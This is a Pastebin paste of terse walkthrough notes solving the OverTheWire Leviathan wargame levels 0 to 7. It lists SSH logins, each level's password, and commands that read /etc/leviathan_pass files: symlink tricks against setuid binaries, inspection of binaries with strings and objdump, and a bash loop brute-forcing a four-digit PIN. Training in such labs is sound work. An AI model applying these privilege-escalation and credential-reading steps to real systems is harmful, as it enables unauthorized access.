Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. ssh leviathan0@leviathan.labs.overthewire.org
  2. password leviathan0
  3.  
  4. cd .backup/
  5. cat bookmarks.html | grep -i pass
  6.  
  7. ssh leviathan1@leviathan.labs.overthewire.org
  8. password rioGegei8m
  9.  
  10. objdump -s check
  11. ./check
  12. sex god
  13. id
  14. cat /etc/leviathan_pass/leviathan2
  15. ougahZi8Ta
  16.  
  17. ssh leviathan2@leviathan.labs.overthewire.org
  18. password ougahZi8Ta
  19.  
  20. mkdir /tmp/qualcosa
  21. cd /tmp/qualcosa
  22. echo ciao > "file file2"
  23. ln -s /etc/leviathan_pass/leviathan3
  24. ~/printfile "file file2"
  25. thank to http://mozcode.blogspot.it/2012/07/leviathan-level-2-walkthrough.html
  26.  
  27. ssh leviathan3@leviathan.labs.overthewire.org
  28. password Ahdiemoo1j
  29. strings level3
  30. ./level3
  31. snlprintf
  32. cat /etc/leviathan_pass/leviathan4
  33. vuH0coox6m
  34.  
  35. ssh leviathan4@leviathan.labs.overthewire.org
  36. password vuH0coox6m
  37. ll
  38. cd .trash
  39. ll
  40. ./bin
  41. 01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010 ---> Tith4cokei
  42.  
  43. ssh leviathan5@leviathan.labs.overthewire.org
  44. password Tith4cokei
  45. ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log
  46. ./leviathan5
  47. UgaoFee4li
  48.  
  49. ssh leviathan6@leviathan.labs.overthewire.org
  50. password UgaoFee4li
  51. mkdir /tmp/qualcosa
  52. vim file.sh
  53.  
  54. #!/bin/bash
  55. for i in {0000..9999}
  56. do
  57. ~/leviathan6 $i
  58. done
  59.  
  60. ./file.sh >> test
  61. wait about 50 sec, then write directly
  62. id
  63. cat /etc/leviathan_pass/leviathan7
  64. Ctrl+Z
  65. cat test
  66. ahy7MaeBo9
  67.  
  68. ssh leviathan7@leviathan.labs.overthewire.org
  69. password ahy7MaeBo9
  70. cat CONGRATULATIONS